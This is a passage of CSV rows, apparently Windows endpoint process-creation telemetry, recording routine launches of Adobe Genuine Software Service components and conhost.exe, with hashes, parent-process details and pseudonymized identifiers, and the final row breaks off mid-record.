+141,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.222406100+00:00,4044,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vuyzdx 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.243037700+00:00,2021-06-24 01:02:01.841680700+00:00,b37a2891-42ca-44a0-9027-61e81a7091d9,computerpii_0a470890c60768167990033d701e7bd881398861,169758,False,10.7740.19041.1052,False,11540474045136991,,11540474045175403,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+142,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.228252200+00:00,20260,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:03.220970100+00:00,3216,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_btsekw 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.243954+00:00,2021-06-24 01:02:01.841762100+00:00,a361ac23-c586-4e7e-a22f-7421bdc27bbd,computerpii_0a470890c60768167990033d701e7bd881398861,169759,False,10.7740.19041.1052,False,11540474045175402,,11540474045175404,2021-06-24 01:00:03.220970100+00:00,3216,2021-06-24 01:00:03.220970100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3216,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+143,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.229851400+00:00,19484,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:03.222406100+00:00,4044,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vuyzdx 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.244332900+00:00,2021-06-24 01:02:01.841872200+00:00,6e2d4ec6-d1e5-4bc6-9c2f-dfdc56f14c1a,computerpii_0a470890c60768167990033d701e7bd881398861,169760,False,10.7740.19041.1052,False,11540474045175403,,11540474045175405,2021-06-24 01:00:03.222406100+00:00,4044,2021-06-24 01:00:03.222406100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4044,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+144,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.444037900+00:00,15924,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a21148"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a21148""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.468285200+00:00,2021-06-24 01:02:01.842319400+00:00,97f1688e-5a21-408e-b823-91e129d03fe4,computerpii_0a470890c60768167990033d701e7bd881398861,169765,False,10.7740.19041.1052,False,11540474045136991,,11540474045175407,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+145,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.456116900+00:00,15756,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:03.444037900+00:00,15924,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a21148"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a21148""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.515321500+00:00,2021-06-24 01:02:01.842550900+00:00,436b5ed4-c4fa-4adf-a5bf-a5dfd451d986,computerpii_0a470890c60768167990033d701e7bd881398861,169768,False,10.7740.19041.1052,False,11540474045175407,,11540474045175409,2021-06-24 01:00:03.444037900+00:00,15924,2021-06-24 01:00:03.444037900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,15924,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:48.179257800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+146,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.510985+00:00,11624,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a21148"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a21148""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:03.444037900+00:00,15924,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a21148"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a21148""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.520100100+00:00,2021-06-24 01:02:01.842693200+00:00,7ab6e2b4-ca81-4d53-9e41-472bda2a58bf,computerpii_0a470890c60768167990033d701e7bd881398861,169770,False,10.7740.19041.1052,False,11540474045175407,,11540474045175410,2021-06-24 01:00:03.444037900+00:00,15924,2021-06-24 01:00:03.444037900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,15924,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:48.179257800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+147,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:04.486933200+00:00,15296,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_fdvjvx 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:04.516570600+00:00,2021-06-24 01:02:01.843451600+00:00,e6f1913a-9627-4688-a6d5-416f64b7800a,computerpii_0a470890c60768167990033d701e7bd881398861,169779,False,10.7740.19041.1052,False,11540474045136991,,11540474045175411,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+148,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:04.487883100+00:00,5960,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_yppyta 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:04.516815500+00:00,2021-06-24 01:02:01.843555500+00:00,0ad8f08c-ae39-47c3-8004-0d2323db2d78,computerpii_0a470890c60768167990033d701e7bd881398861,169780,False,10.7740.19041.1052,False,11540474045136991,,11540474045175412,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+149,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:04.495069400+00:00,9256,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:04.487883100+00:00,5960,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_yppyta 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:04.517710900+00:00,2021-06-24 01:02:01.843656200+00:00,4d2dc5a5-60d1-47f2-a6bc-e6efcd96dd3b,computerpii_0a470890c60768167990033d701e7bd881398861,169781,False,10.7740.19041.1052,False,11540474045175412,,11540474045175414,2021-06-24 01:00:04.487883100+00:00,5960,2021-06-24 01:00:04.487883100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,5960,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 01:00:04.501744300+00:00,2020-09-22 19:30:00+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+150,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:04.495053400+00:00,12600,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:04.486933200+00:00,15296,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_fdvjvx 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:04.517881500+00:00,2021-06-24 01:02:01.843767400+00:00,c12849b9-b693-4de5-ac74-56e69db3aff8,computerpii_0a470890c60768167990033d701e7bd881398861,169782,False,10.7740.19041.1052,False,11540474045175411,,11540474045175413,2021-06-24 01:00:04.486933200+00:00,15296,2021-06-24 01:00:04.486933200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,15296,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 01:00:04.501744300+00:00,2020-09-22 